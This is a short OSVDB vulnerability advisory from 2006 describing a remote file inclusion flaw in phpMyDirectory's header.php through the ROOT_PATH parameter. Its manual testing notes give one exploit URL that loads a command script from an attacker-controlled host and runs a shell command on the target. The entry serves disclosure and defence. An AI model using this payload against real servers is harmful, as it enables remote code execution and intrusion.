phpMyDirectory header.php ROOT_PATH Variable Remote File Inclusion

2006-05-22T02:35:55
ID OSVDB:26153
Type osvdb
Reporter OSVDB
Modified 2006-05-22T02:35:55

Description

Manual Testing Notes

http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://[attacker]/cmd.txt?cmd=ls

References:

Vendor URL: http://www.phpmydirectory.com/ Related OSVDB ID: 26151 Related OSVDB ID: 26152 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0470.html